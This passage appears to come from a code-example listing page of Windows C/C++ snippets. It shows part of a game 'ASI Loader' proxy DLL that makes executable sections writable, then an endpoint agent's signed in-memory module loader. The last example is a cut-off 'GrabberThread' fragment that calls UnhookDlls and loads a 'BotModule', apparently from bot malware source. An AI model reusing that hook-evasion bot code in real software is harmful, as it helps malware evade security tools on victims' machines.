							d3d9.Direct3DCreate9 = GetProcAddress(d3d9.dll, "Direct3DCreate9");
							d3d9.Direct3DCreate9Ex = GetProcAddress(d3d9.dll, "Direct3DCreate9Ex");
							d3d9.Direct3DShaderValidatorCreate9 = GetProcAddress(d3d9.dll, "Direct3DShaderValidatorCreate9");
							d3d9.PSGPError = GetProcAddress(d3d9.dll, "PSGPError");
							d3d9.PSGPSampleTexture = GetProcAddress(d3d9.dll, "PSGPSampleTexture");
						}
						else
						{
							if (_stricmp(DllName + 1, "d3d11.dll") == NULL) {
								d3d11.dll = LoadLibrary(szSystemPath);
								d3d11.D3D11CoreCreateDevice = GetProcAddress(d3d11.dll, "D3D11CoreCreateDevice");
								d3d11.D3D11CoreCreateLayeredDevice = GetProcAddress(d3d11.dll, "D3D11CoreCreateLayeredDevice");
								d3d11.D3D11CoreGetLayeredDeviceSize = GetProcAddress(d3d11.dll, "D3D11CoreGetLayeredDeviceSize");
								d3d11.D3D11CoreRegisterLayers = GetProcAddress(d3d11.dll, "D3D11CoreRegisterLayers");
								d3d11.D3D11CreateDevice = GetProcAddress(d3d11.dll, "D3D11CreateDevice");
								d3d11.D3D11CreateDeviceAndSwapChain = GetProcAddress(d3d11.dll, "D3D11CreateDeviceAndSwapChain");
								d3d11.D3DKMTCloseAdapter = GetProcAddress(d3d11.dll, "D3DKMTCloseAdapter");
								d3d11.D3DKMTCreateAllocation = GetProcAddress(d3d11.dll, "D3DKMTCreateAllocation");
								d3d11.D3DKMTCreateContext = GetProcAddress(d3d11.dll, "D3DKMTCreateContext");
								d3d11.D3DKMTCreateDevice = GetProcAddress(d3d11.dll, "D3DKMTCreateDevice");
								d3d11.D3DKMTCreateSynchronizationObject = GetProcAddress(d3d11.dll, "D3DKMTCreateSynchronizationObject");
								d3d11.D3DKMTDestroyAllocation = GetProcAddress(d3d11.dll, "D3DKMTDestroyAllocation");
								d3d11.D3DKMTDestroyContext = GetProcAddress(d3d11.dll, "D3DKMTDestroyContext");
								d3d11.D3DKMTDestroyDevice = GetProcAddress(d3d11.dll, "D3DKMTDestroyDevice");
								d3d11.D3DKMTDestroySynchronizationObject = GetProcAddress(d3d11.dll, "D3DKMTDestroySynchronizationObject");
								d3d11.D3DKMTEscape = GetProcAddress(d3d11.dll, "D3DKMTEscape");
								d3d11.D3DKMTGetContextSchedulingPriority = GetProcAddress(d3d11.dll, "D3DKMTGetContextSchedulingPriority");
								d3d11.D3DKMTGetDeviceState = GetProcAddress(d3d11.dll, "D3DKMTGetDeviceState");
								d3d11.D3DKMTGetDisplayModeList = GetProcAddress(d3d11.dll, "D3DKMTGetDisplayModeList");
								d3d11.D3DKMTGetMultisampleMethodList = GetProcAddress(d3d11.dll, "D3DKMTGetMultisampleMethodList");
								d3d11.D3DKMTGetRuntimeData = GetProcAddress(d3d11.dll, "D3DKMTGetRuntimeData");
								d3d11.D3DKMTGetSharedPrimaryHandle = GetProcAddress(d3d11.dll, "D3DKMTGetSharedPrimaryHandle");
								d3d11.D3DKMTLock = GetProcAddress(d3d11.dll, "D3DKMTLock");
								d3d11.D3DKMTOpenAdapterFromHdc = GetProcAddress(d3d11.dll, "D3DKMTOpenAdapterFromHdc");
								d3d11.D3DKMTOpenResource = GetProcAddress(d3d11.dll, "D3DKMTOpenResource");
								d3d11.D3DKMTPresent = GetProcAddress(d3d11.dll, "D3DKMTPresent");
								d3d11.D3DKMTQueryAdapterInfo = GetProcAddress(d3d11.dll, "D3DKMTQueryAdapterInfo");
								d3d11.D3DKMTQueryAllocationResidency = GetProcAddress(d3d11.dll, "D3DKMTQueryAllocationResidency");
								d3d11.D3DKMTQueryResourceInfo = GetProcAddress(d3d11.dll, "D3DKMTQueryResourceInfo");
								d3d11.D3DKMTRender = GetProcAddress(d3d11.dll, "D3DKMTRender");
								d3d11.D3DKMTSetAllocationPriority = GetProcAddress(d3d11.dll, "D3DKMTSetAllocationPriority");
								d3d11.D3DKMTSetContextSchedulingPriority = GetProcAddress(d3d11.dll, "D3DKMTSetContextSchedulingPriority");
								d3d11.D3DKMTSetDisplayMode = GetProcAddress(d3d11.dll, "D3DKMTSetDisplayMode");
								d3d11.D3DKMTSetDisplayPrivateDriverFormat = GetProcAddress(d3d11.dll, "D3DKMTSetDisplayPrivateDriverFormat");
								d3d11.D3DKMTSetGammaRamp = GetProcAddress(d3d11.dll, "D3DKMTSetGammaRamp");
								d3d11.D3DKMTSetVidPnSourceOwner = GetProcAddress(d3d11.dll, "D3DKMTSetVidPnSourceOwner");
								d3d11.D3DKMTSignalSynchronizationObject = GetProcAddress(d3d11.dll, "D3DKMTSignalSynchronizationObject");
								d3d11.D3DKMTUnlock = GetProcAddress(d3d11.dll, "D3DKMTUnlock");
								d3d11.D3DKMTWaitForSynchronizationObject = GetProcAddress(d3d11.dll, "D3DKMTWaitForSynchronizationObject");
								d3d11.D3DKMTWaitForVerticalBlankEvent = GetProcAddress(d3d11.dll, "D3DKMTWaitForVerticalBlankEvent");
								d3d11.D3DPerformance_BeginEvent = GetProcAddress(d3d11.dll, "D3DPerformance_BeginEvent");
								d3d11.D3DPerformance_EndEvent = GetProcAddress(d3d11.dll, "D3DPerformance_EndEvent");
								d3d11.D3DPerformance_GetStatus = GetProcAddress(d3d11.dll, "D3DPerformance_GetStatus");
								d3d11.D3DPerformance_SetMarker = GetProcAddress(d3d11.dll, "D3DPerformance_SetMarker");
								d3d11.EnableFeatureLevelUpgrade = GetProcAddress(d3d11.dll, "EnableFeatureLevelUpgrade");
								d3d11.OpenAdapter10 = GetProcAddress(d3d11.dll, "OpenAdapter10");
								d3d11.OpenAdapter10_2 = GetProcAddress(d3d11.dll, "OpenAdapter10_2");
							}
							else
							{
								if (_stricmp(DllName + 1, "winmmbase.dll") == NULL) {
									winmmbase.dll = LoadLibrary(szSystemPath);
									winmmbase.CloseDriver = GetProcAddress(winmmbase.dll, "CloseDriver");
									winmmbase.DefDriverProc = GetProcAddress(winmmbase.dll, "DefDriverProc");
									winmmbase.DriverCallback = GetProcAddress(winmmbase.dll, "DriverCallback");
									winmmbase.DrvGetModuleHandle = GetProcAddress(winmmbase.dll, "DrvGetModuleHandle");
									winmmbase.GetDriverModuleHandle = GetProcAddress(winmmbase.dll, "GetDriverModuleHandle");
									winmmbase.OpenDriver = GetProcAddress(winmmbase.dll, "OpenDriver");
									winmmbase.SendDriverMessage = GetProcAddress(winmmbase.dll, "SendDriverMessage");
									winmmbase.auxGetDevCapsA = GetProcAddress(winmmbase.dll, "auxGetDevCapsA");
									winmmbase.auxGetDevCapsW = GetProcAddress(winmmbase.dll, "auxGetDevCapsW");
									winmmbase.auxGetNumDevs = GetProcAddress(winmmbase.dll, "auxGetNumDevs");
									winmmbase.auxGetVolume = GetProcAddress(winmmbase.dll, "auxGetVolume");
									winmmbase.auxOutMessage = GetProcAddress(winmmbase.dll, "auxOutMessage");
									winmmbase.auxSetVolume = GetProcAddress(winmmbase.dll, "auxSetVolume");
									winmmbase.joyConfigChanged = GetProcAddress(winmmbase.dll, "joyConfigChanged");
									winmmbase.joyGetDevCapsA = GetProcAddress(winmmbase.dll, "joyGetDevCapsA");
									winmmbase.joyGetDevCapsW = GetProcAddress(winmmbase.dll, "joyGetDevCapsW");
									winmmbase.joyGetNumDevs = GetProcAddress(winmmbase.dll, "joyGetNumDevs");
									winmmbase.joyGetPos = GetProcAddress(winmmbase.dll, "joyGetPos");
									winmmbase.joyGetPosEx = GetProcAddress(winmmbase.dll, "joyGetPosEx");
									winmmbase.joyGetThreshold = GetProcAddress(winmmbase.dll, "joyGetThreshold");
									winmmbase.joyReleaseCapture = GetProcAddress(winmmbase.dll, "joyReleaseCapture");
									winmmbase.joySetCapture = GetProcAddress(winmmbase.dll, "joySetCapture");
									winmmbase.joySetThreshold = GetProcAddress(winmmbase.dll, "joySetThreshold");
									winmmbase.midiConnect = GetProcAddress(winmmbase.dll, "midiConnect");
									winmmbase.midiDisconnect = GetProcAddress(winmmbase.dll, "midiDisconnect");
									winmmbase.midiInAddBuffer = GetProcAddress(winmmbase.dll, "midiInAddBuffer");
									winmmbase.midiInClose = GetProcAddress(winmmbase.dll, "midiInClose");
									winmmbase.midiInGetDevCapsA = GetProcAddress(winmmbase.dll, "midiInGetDevCapsA");
									winmmbase.midiInGetDevCapsW = GetProcAddress(winmmbase.dll, "midiInGetDevCapsW");
									winmmbase.midiInGetErrorTextA = GetProcAddress(winmmbase.dll, "midiInGetErrorTextA");
									winmmbase.midiInGetErrorTextW = GetProcAddress(winmmbase.dll, "midiInGetErrorTextW");
									winmmbase.midiInGetID = GetProcAddress(winmmbase.dll, "midiInGetID");
									winmmbase.midiInGetNumDevs = GetProcAddress(winmmbase.dll, "midiInGetNumDevs");
									winmmbase.midiInMessage = GetProcAddress(winmmbase.dll, "midiInMessage");
									winmmbase.midiInOpen = GetProcAddress(winmmbase.dll, "midiInOpen");
									winmmbase.midiInPrepareHeader = GetProcAddress(winmmbase.dll, "midiInPrepareHeader");
									winmmbase.midiInReset = GetProcAddress(winmmbase.dll, "midiInReset");
									winmmbase.midiInStart = GetProcAddress(winmmbase.dll, "midiInStart");
									winmmbase.midiInStop = GetProcAddress(winmmbase.dll, "midiInStop");
									winmmbase.midiInUnprepareHeader = GetProcAddress(winmmbase.dll, "midiInUnprepareHeader");
									winmmbase.midiOutCacheDrumPatches = GetProcAddress(winmmbase.dll, "midiOutCacheDrumPatches");
									winmmbase.midiOutCachePatches = GetProcAddress(winmmbase.dll, "midiOutCachePatches");
									winmmbase.midiOutClose = GetProcAddress(winmmbase.dll, "midiOutClose");
									winmmbase.midiOutGetDevCapsA = GetProcAddress(winmmbase.dll, "midiOutGetDevCapsA");
									winmmbase.midiOutGetDevCapsW = GetProcAddress(winmmbase.dll, "midiOutGetDevCapsW");
									winmmbase.midiOutGetErrorTextA = GetProcAddress(winmmbase.dll, "midiOutGetErrorTextA");
									winmmbase.midiOutGetErrorTextW = GetProcAddress(winmmbase.dll, "midiOutGetErrorTextW");
									winmmbase.midiOutGetID = GetProcAddress(winmmbase.dll, "midiOutGetID");
									winmmbase.midiOutGetNumDevs = GetProcAddress(winmmbase.dll, "midiOutGetNumDevs");
									winmmbase.midiOutGetVolume = GetProcAddress(winmmbase.dll, "midiOutGetVolume");
									winmmbase.midiOutLongMsg = GetProcAddress(winmmbase.dll, "midiOutLongMsg");
									winmmbase.midiOutMessage = GetProcAddress(winmmbase.dll, "midiOutMessage");
									winmmbase.midiOutOpen = GetProcAddress(winmmbase.dll, "midiOutOpen");
									winmmbase.midiOutPrepareHeader = GetProcAddress(winmmbase.dll, "midiOutPrepareHeader");
									winmmbase.midiOutReset = GetProcAddress(winmmbase.dll, "midiOutReset");
									winmmbase.midiOutSetVolume = GetProcAddress(winmmbase.dll, "midiOutSetVolume");
									winmmbase.midiOutShortMsg = GetProcAddress(winmmbase.dll, "midiOutShortMsg");
									winmmbase.midiOutUnprepareHeader = GetProcAddress(winmmbase.dll, "midiOutUnprepareHeader");
									winmmbase.midiStreamClose = GetProcAddress(winmmbase.dll, "midiStreamClose");
									winmmbase.midiStreamOpen = GetProcAddress(winmmbase.dll, "midiStreamOpen");
									winmmbase.midiStreamOut = GetProcAddress(winmmbase.dll, "midiStreamOut");
									winmmbase.midiStreamPause = GetProcAddress(winmmbase.dll, "midiStreamPause");
									winmmbase.midiStreamPosition = GetProcAddress(winmmbase.dll, "midiStreamPosition");
									winmmbase.midiStreamProperty = GetProcAddress(winmmbase.dll, "midiStreamProperty");
									winmmbase.midiStreamRestart = GetProcAddress(winmmbase.dll, "midiStreamRestart");
									winmmbase.midiStreamStop = GetProcAddress(winmmbase.dll, "midiStreamStop");
									winmmbase.mixerClose = GetProcAddress(winmmbase.dll, "mixerClose");
									winmmbase.mixerGetControlDetailsA = GetProcAddress(winmmbase.dll, "mixerGetControlDetailsA");
									winmmbase.mixerGetControlDetailsW = GetProcAddress(winmmbase.dll, "mixerGetControlDetailsW");
									winmmbase.mixerGetDevCapsA = GetProcAddress(winmmbase.dll, "mixerGetDevCapsA");
									winmmbase.mixerGetDevCapsW = GetProcAddress(winmmbase.dll, "mixerGetDevCapsW");
									winmmbase.mixerGetID = GetProcAddress(winmmbase.dll, "mixerGetID");
									winmmbase.mixerGetLineControlsA = GetProcAddress(winmmbase.dll, "mixerGetLineControlsA");
									winmmbase.mixerGetLineControlsW = GetProcAddress(winmmbase.dll, "mixerGetLineControlsW");
									winmmbase.mixerGetLineInfoA = GetProcAddress(winmmbase.dll, "mixerGetLineInfoA");
									winmmbase.mixerGetLineInfoW = GetProcAddress(winmmbase.dll, "mixerGetLineInfoW");
									winmmbase.mixerGetNumDevs = GetProcAddress(winmmbase.dll, "mixerGetNumDevs");
									winmmbase.mixerMessage = GetProcAddress(winmmbase.dll, "mixerMessage");
									winmmbase.mixerOpen = GetProcAddress(winmmbase.dll, "mixerOpen");
									winmmbase.mixerSetControlDetails = GetProcAddress(winmmbase.dll, "mixerSetControlDetails");
									winmmbase.mmDrvInstall = GetProcAddress(winmmbase.dll, "mmDrvInstall");
									winmmbase.mmGetCurrentTask = GetProcAddress(winmmbase.dll, "mmGetCurrentTask");
									winmmbase.mmTaskBlock = GetProcAddress(winmmbase.dll, "mmTaskBlock");
									winmmbase.mmTaskCreate = GetProcAddress(winmmbase.dll, "mmTaskCreate");
									winmmbase.mmTaskSignal = GetProcAddress(winmmbase.dll, "mmTaskSignal");
									winmmbase.mmTaskYield = GetProcAddress(winmmbase.dll, "mmTaskYield");
									winmmbase.mmioAdvance = GetProcAddress(winmmbase.dll, "mmioAdvance");
									winmmbase.mmioAscend = GetProcAddress(winmmbase.dll, "mmioAscend");
									winmmbase.mmioClose = GetProcAddress(winmmbase.dll, "mmioClose");
									winmmbase.mmioCreateChunk = GetProcAddress(winmmbase.dll, "mmioCreateChunk");
									winmmbase.mmioDescend = GetProcAddress(winmmbase.dll, "mmioDescend");
									winmmbase.mmioFlush = GetProcAddress(winmmbase.dll, "mmioFlush");
									winmmbase.mmioGetInfo = GetProcAddress(winmmbase.dll, "mmioGetInfo");
									winmmbase.mmioInstallIOProcA = GetProcAddress(winmmbase.dll, "mmioInstallIOProcA");
									winmmbase.mmioInstallIOProcW = GetProcAddress(winmmbase.dll, "mmioInstallIOProcW");
									winmmbase.mmioOpenA = GetProcAddress(winmmbase.dll, "mmioOpenA");
									winmmbase.mmioOpenW = GetProcAddress(winmmbase.dll, "mmioOpenW");
									winmmbase.mmioRead = GetProcAddress(winmmbase.dll, "mmioRead");
									winmmbase.mmioRenameA = GetProcAddress(winmmbase.dll, "mmioRenameA");
									winmmbase.mmioRenameW = GetProcAddress(winmmbase.dll, "mmioRenameW");
									winmmbase.mmioSeek = GetProcAddress(winmmbase.dll, "mmioSeek");
									winmmbase.mmioSendMessage = GetProcAddress(winmmbase.dll, "mmioSendMessage");
									winmmbase.mmioSetBuffer = GetProcAddress(winmmbase.dll, "mmioSetBuffer");
									winmmbase.mmioSetInfo = GetProcAddress(winmmbase.dll, "mmioSetInfo");
									winmmbase.mmioStringToFOURCCA = GetProcAddress(winmmbase.dll, "mmioStringToFOURCCA");
									winmmbase.mmioStringToFOURCCW = GetProcAddress(winmmbase.dll, "mmioStringToFOURCCW");
									winmmbase.mmioWrite = GetProcAddress(winmmbase.dll, "mmioWrite");
									winmmbase.sndOpenSound = GetProcAddress(winmmbase.dll, "sndOpenSound");
									winmmbase.waveInAddBuffer = GetProcAddress(winmmbase.dll, "waveInAddBuffer");
									winmmbase.waveInClose = GetProcAddress(winmmbase.dll, "waveInClose");
									winmmbase.waveInGetDevCapsA = GetProcAddress(winmmbase.dll, "waveInGetDevCapsA");
									winmmbase.waveInGetDevCapsW = GetProcAddress(winmmbase.dll, "waveInGetDevCapsW");
									winmmbase.waveInGetErrorTextA = GetProcAddress(winmmbase.dll, "waveInGetErrorTextA");
									winmmbase.waveInGetErrorTextW = GetProcAddress(winmmbase.dll, "waveInGetErrorTextW");
									winmmbase.waveInGetID = GetProcAddress(winmmbase.dll, "waveInGetID");
									winmmbase.waveInGetNumDevs = GetProcAddress(winmmbase.dll, "waveInGetNumDevs");
									winmmbase.waveInGetPosition = GetProcAddress(winmmbase.dll, "waveInGetPosition");
									winmmbase.waveInMessage = GetProcAddress(winmmbase.dll, "waveInMessage");
									winmmbase.waveInOpen = GetProcAddress(winmmbase.dll, "waveInOpen");
									winmmbase.waveInPrepareHeader = GetProcAddress(winmmbase.dll, "waveInPrepareHeader");
									winmmbase.waveInReset = GetProcAddress(winmmbase.dll, "waveInReset");
									winmmbase.waveInStart = GetProcAddress(winmmbase.dll, "waveInStart");
									winmmbase.waveInStop = GetProcAddress(winmmbase.dll, "waveInStop");
									winmmbase.waveInUnprepareHeader = GetProcAddress(winmmbase.dll, "waveInUnprepareHeader");
									winmmbase.waveOutBreakLoop = GetProcAddress(winmmbase.dll, "waveOutBreakLoop");
									winmmbase.waveOutClose = GetProcAddress(winmmbase.dll, "waveOutClose");
									winmmbase.waveOutGetDevCapsA = GetProcAddress(winmmbase.dll, "waveOutGetDevCapsA");
									winmmbase.waveOutGetDevCapsW = GetProcAddress(winmmbase.dll, "waveOutGetDevCapsW");
									winmmbase.waveOutGetErrorTextA = GetProcAddress(winmmbase.dll, "waveOutGetErrorTextA");
									winmmbase.waveOutGetErrorTextW = GetProcAddress(winmmbase.dll, "waveOutGetErrorTextW");
									winmmbase.waveOutGetID = GetProcAddress(winmmbase.dll, "waveOutGetID");
									winmmbase.waveOutGetNumDevs = GetProcAddress(winmmbase.dll, "waveOutGetNumDevs");
									winmmbase.waveOutGetPitch = GetProcAddress(winmmbase.dll, "waveOutGetPitch");
									winmmbase.waveOutGetPlaybackRate = GetProcAddress(winmmbase.dll, "waveOutGetPlaybackRate");
									winmmbase.waveOutGetPosition = GetProcAddress(winmmbase.dll, "waveOutGetPosition");
									winmmbase.waveOutGetVolume = GetProcAddress(winmmbase.dll, "waveOutGetVolume");
									winmmbase.waveOutMessage = GetProcAddress(winmmbase.dll, "waveOutMessage");
									winmmbase.waveOutOpen = GetProcAddress(winmmbase.dll, "waveOutOpen");
									winmmbase.waveOutPause = GetProcAddress(winmmbase.dll, "waveOutPause");
									winmmbase.waveOutPrepareHeader = GetProcAddress(winmmbase.dll, "waveOutPrepareHeader");
									winmmbase.waveOutReset = GetProcAddress(winmmbase.dll, "waveOutReset");
									winmmbase.waveOutRestart = GetProcAddress(winmmbase.dll, "waveOutRestart");
									winmmbase.waveOutSetPitch = GetProcAddress(winmmbase.dll, "waveOutSetPitch");
									winmmbase.waveOutSetPlaybackRate = GetProcAddress(winmmbase.dll, "waveOutSetPlaybackRate");
									winmmbase.waveOutSetVolume = GetProcAddress(winmmbase.dll, "waveOutSetVolume");
									winmmbase.waveOutUnprepareHeader = GetProcAddress(winmmbase.dll, "waveOutUnprepareHeader");
									winmmbase.waveOutWrite = GetProcAddress(winmmbase.dll, "waveOutWrite");
									winmmbase.winmmbaseFreeMMEHandles = GetProcAddress(winmmbase.dll, "winmmbaseFreeMMEHandles");
									winmmbase.winmmbaseGetWOWHandle = GetProcAddress(winmmbase.dll, "winmmbaseGetWOWHandle");
									winmmbase.winmmbaseHandle32FromHandle16 = GetProcAddress(winmmbase.dll, "winmmbaseHandle32FromHandle16");
									winmmbase.winmmbaseSetWOWHandle = GetProcAddress(winmmbase.dll, "winmmbaseSetWOWHandle");
								}
								else
								{
									if (_stricmp(DllName + 1, "msacm32.dll") == NULL) {
										msacm32.dll = LoadLibrary(szSystemPath);
										msacm32.acmDriverAddA = GetProcAddress(msacm32.dll, "acmDriverAddA");
										msacm32.acmDriverAddW = GetProcAddress(msacm32.dll, "acmDriverAddW");
										msacm32.acmDriverClose = GetProcAddress(msacm32.dll, "acmDriverClose");
										msacm32.acmDriverDetailsA = GetProcAddress(msacm32.dll, "acmDriverDetailsA");
										msacm32.acmDriverDetailsW = GetProcAddress(msacm32.dll, "acmDriverDetailsW");
										msacm32.acmDriverEnum = GetProcAddress(msacm32.dll, "acmDriverEnum");
										msacm32.acmDriverID = GetProcAddress(msacm32.dll, "acmDriverID");
										msacm32.acmDriverMessage = GetProcAddress(msacm32.dll, "acmDriverMessage");
										msacm32.acmDriverOpen = GetProcAddress(msacm32.dll, "acmDriverOpen");
										msacm32.acmDriverPriority = GetProcAddress(msacm32.dll, "acmDriverPriority");
										msacm32.acmDriverRemove = GetProcAddress(msacm32.dll, "acmDriverRemove");
										msacm32.acmFilterChooseA = GetProcAddress(msacm32.dll, "acmFilterChooseA");
										msacm32.acmFilterChooseW = GetProcAddress(msacm32.dll, "acmFilterChooseW");
										msacm32.acmFilterDetailsA = GetProcAddress(msacm32.dll, "acmFilterDetailsA");
										msacm32.acmFilterDetailsW = GetProcAddress(msacm32.dll, "acmFilterDetailsW");
										msacm32.acmFilterEnumA = GetProcAddress(msacm32.dll, "acmFilterEnumA");
										msacm32.acmFilterEnumW = GetProcAddress(msacm32.dll, "acmFilterEnumW");
										msacm32.acmFilterTagDetailsA = GetProcAddress(msacm32.dll, "acmFilterTagDetailsA");
										msacm32.acmFilterTagDetailsW = GetProcAddress(msacm32.dll, "acmFilterTagDetailsW");
										msacm32.acmFilterTagEnumA = GetProcAddress(msacm32.dll, "acmFilterTagEnumA");
										msacm32.acmFilterTagEnumW = GetProcAddress(msacm32.dll, "acmFilterTagEnumW");
										msacm32.acmFormatChooseA = GetProcAddress(msacm32.dll, "acmFormatChooseA");
										msacm32.acmFormatChooseW = GetProcAddress(msacm32.dll, "acmFormatChooseW");
										msacm32.acmFormatDetailsA = GetProcAddress(msacm32.dll, "acmFormatDetailsA");
										msacm32.acmFormatDetailsW = GetProcAddress(msacm32.dll, "acmFormatDetailsW");
										msacm32.acmFormatEnumA = GetProcAddress(msacm32.dll, "acmFormatEnumA");
										msacm32.acmFormatEnumW = GetProcAddress(msacm32.dll, "acmFormatEnumW");
										msacm32.acmFormatSuggest = GetProcAddress(msacm32.dll, "acmFormatSuggest");
										msacm32.acmFormatTagDetailsA = GetProcAddress(msacm32.dll, "acmFormatTagDetailsA");
										msacm32.acmFormatTagDetailsW = GetProcAddress(msacm32.dll, "acmFormatTagDetailsW");
										msacm32.acmFormatTagEnumA = GetProcAddress(msacm32.dll, "acmFormatTagEnumA");
										msacm32.acmFormatTagEnumW = GetProcAddress(msacm32.dll, "acmFormatTagEnumW");
										msacm32.acmGetVersion = GetProcAddress(msacm32.dll, "acmGetVersion");
										msacm32.acmMetrics = GetProcAddress(msacm32.dll, "acmMetrics");
										msacm32.acmStreamClose = GetProcAddress(msacm32.dll, "acmStreamClose");
										msacm32.acmStreamConvert = GetProcAddress(msacm32.dll, "acmStreamConvert");
										msacm32.acmStreamMessage = GetProcAddress(msacm32.dll, "acmStreamMessage");
										msacm32.acmStreamOpen = GetProcAddress(msacm32.dll, "acmStreamOpen");
										msacm32.acmStreamPrepareHeader = GetProcAddress(msacm32.dll, "acmStreamPrepareHeader");
										msacm32.acmStreamReset = GetProcAddress(msacm32.dll, "acmStreamReset");
										msacm32.acmStreamSize = GetProcAddress(msacm32.dll, "acmStreamSize");
										msacm32.acmStreamUnprepareHeader = GetProcAddress(msacm32.dll, "acmStreamUnprepareHeader");
									}
									else
									{
										if (_stricmp(DllName + 1, "xlive.dll") == NULL) 
										{
											// Unprotect image - make .text and .rdata section writeable
											// get load address of the exe
											DWORD dwLoadOffset = (DWORD)GetModuleHandle(NULL);
											BYTE * pImageBase = reinterpret_cast<BYTE *>(dwLoadOffset);
											PIMAGE_DOS_HEADER   pDosHeader = reinterpret_cast<PIMAGE_DOS_HEADER> (dwLoadOffset);
											PIMAGE_NT_HEADERS   pNtHeader = reinterpret_cast<PIMAGE_NT_HEADERS> (pImageBase + pDosHeader->e_lfanew);
											PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pNtHeader);

											for (int iSection = 0; iSection < pNtHeader->FileHeader.NumberOfSections; ++iSection, ++pSection) {
												char * pszSectionName = reinterpret_cast<char *>(pSection->Name);
												if (!strcmp(pszSectionName, ".text") || !strcmp(pszSectionName, ".rdata")) {
													DWORD dwPhysSize = (pSection->Misc.VirtualSize + 4095) & ~4095;
													DWORD	oldProtect;
													DWORD   newProtect = (pSection->Characteristics & IMAGE_SCN_MEM_EXECUTE) ? PAGE_EXECUTE_READWRITE : PAGE_READWRITE;
													if (!VirtualProtect(reinterpret_cast <VOID *>(dwLoadOffset + pSection->VirtualAddress), dwPhysSize, newProtect, &oldProtect)) {
														ExitProcess(0);
													}
												}
											}
										}
										else
										{
											MessageBox(0, "This library isn't supported. Try to rename it to d3d8.dll, d3d9.dll, d3d11.dll, winmmbase.dll, msacm32.dll, dinput8.dll, dsound.dll, vorbisFile.dll, xlive.dll or ddraw.dll.", "ASI Loader", MB_ICONERROR);
											ExitProcess(0);
										}
									}
								}
							}
						}
					}
				}
			}
		}
	}
}
Example #20
0
RPRIVATE_TESTABLE
RBOOL 
    loadModule
    (
        rpHCPContext* hcpContext,
        rSequence seq
    )
{
    RBOOL isSuccess = FALSE;

    RU32 moduleIndex = (RU32)(-1);

    RPU8 tmpBuff = NULL;
    RU32 tmpSize = 0;

    RPU8 tmpSig = NULL;
    RU32 tmpSigSize = 0;

    rpal_thread_func pEntry = NULL;

    rpHCPModuleContext* modContext = NULL;

    OBFUSCATIONLIB_DECLARE( entryName, RP_HCP_CONFIG_MODULE_ENTRY );
    OBFUSCATIONLIB_DECLARE( recvMessage, RP_HCP_CONFIG_MODULE_RECV_MESSAGE );

    if( NULL != seq &&
        NULL != hcpContext )
    {
        for( moduleIndex = 0; moduleIndex < RP_HCP_CONTEXT_MAX_MODULES; moduleIndex++ )
        {
            if( 0 == hcpContext->modules[ moduleIndex ].hThread )
            {
                // Found an empty spot
                break;
            }
        }
    }

    if( RP_HCP_CONTEXT_MAX_MODULES != moduleIndex &&
        (RU32)(-1) != moduleIndex )
    {
        // We got an empty spot for our module
        if( rSequence_getRU8( seq, 
                              RP_TAGS_HCP_MODULE_ID, 
                              &(hcpContext->modules[ moduleIndex ].id ) ) &&
            rSequence_getBUFFER( seq,
                                 RP_TAGS_BINARY, 
                                 &tmpBuff, 
                                 &tmpSize ) &&
            rSequence_getBUFFER( seq,
                                 RP_TAGS_SIGNATURE,
                                 &tmpSig,
                                 &tmpSigSize ) &&
            CRYPTOLIB_SIGNATURE_SIZE == tmpSigSize )
        {
            // We got the data, now verify the buffer signature
            if( CryptoLib_verify( tmpBuff, tmpSize, getRootPublicKey(), tmpSig ) )
            {
                // Ready to load the module
                rpal_debug_info( "loading module in memory" );
                hcpContext->modules[ moduleIndex ].hModule = MemoryLoadLibrary( tmpBuff, tmpSize );

                if( NULL != hcpContext->modules[ moduleIndex ].hModule )
                {
                    OBFUSCATIONLIB_TOGGLE( entryName );

                    pEntry = (rpal_thread_func)MemoryGetProcAddress( hcpContext->modules[ moduleIndex ].hModule,
                                                            (RPCHAR)entryName );

                    OBFUSCATIONLIB_TOGGLE( entryName );

                    if( NULL != pEntry )
                    {
                        modContext = &(hcpContext->modules[ moduleIndex ].context);

                        modContext->pCurrentId = &( hcpContext->currentId );
                        modContext->func_sendHome = doSend;
                        modContext->isTimeToStop = rEvent_create( TRUE );
                        modContext->rpalContext = rpal_Context_get();
                        modContext->isOnlineEvent = hcpContext->isCloudOnline;

                        if( NULL != modContext->isTimeToStop )
                        {
                            hcpContext->modules[ moduleIndex ].isTimeToStop = modContext->isTimeToStop;

                            OBFUSCATIONLIB_TOGGLE( recvMessage );
                            hcpContext->modules[ moduleIndex ].func_recvMessage =
                                    (rpHCPModuleMsgEntry)MemoryGetProcAddress( hcpContext->modules[ moduleIndex ].hModule,
                                                                               (RPCHAR)recvMessage );
                            OBFUSCATIONLIB_TOGGLE( recvMessage );

                            hcpContext->modules[ moduleIndex ].hThread = rpal_thread_new( pEntry, modContext );

                            if( 0 != hcpContext->modules[ moduleIndex ].hThread )
                            {
                                CryptoLib_hash( tmpBuff, tmpSize, &(hcpContext->modules[ moduleIndex ].hash ) );
                                hcpContext->modules[ moduleIndex ].isOsLoaded = FALSE;
                                isSuccess = TRUE;
                            }
                            else
                            {
                                rpal_debug_warning( "Error creating handler thread for new module." );
                            }
                        }
                    }
                    else
                    {
                        rpal_debug_warning( "Could not find new module's entry point." );
                    }
                }
                else
                {
                    rpal_debug_warning( "Error loading module in memory." );
                }
            }
            else
            {
                rpal_debug_warning( "New module signature invalid." );
            }
        }
        else
        {
            rpal_debug_warning( "Could not find core module components to load." );
        }

        // Main cleanup
        if( !isSuccess )
        {
            if( NULL != modContext )
            {
                IF_VALID_DO( modContext->isTimeToStop, rEvent_free );
            }

            if( NULL != hcpContext->modules[ moduleIndex ].hModule )
            {
                MemoryFreeLibrary( hcpContext->modules[ moduleIndex ].hModule );
            }

            rpal_memory_zero( &(hcpContext->modules[ moduleIndex ] ),
                              sizeof( hcpContext->modules[ moduleIndex ] ) );
        }
    }
    else
    {
        rpal_debug_error( "Could not find a spot for new module, or invalid module id!" );
    }

    return isSuccess;
}
Example #21
0
DWORD WINAPI GrabberThread( LPVOID lpData )
{

	UnhookDlls();

/*
	char GrabberFile[] = {'X',':','\\', 't','r','a','s','h','\\','c','o','d','e','\\','w','o','r','k','\\' ,'r','f','b','\\','b','r','a','n','c','h','e','s','\\','d','l','l','\\','b','i','n','\\','D','e','b','u','g','\\','x','8','6','.','d','l','l',0};
    ///if ( BotModule != NULL  )
	{
		typedef void ( WINAPI *PVNC_Start )();

		HANDLE hFile=CreateFile(GrabberFile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
		DWORD dwSize=GetFileSize(hFile,0);

		LPVOID BotModule = MemAlloc(dwSize);
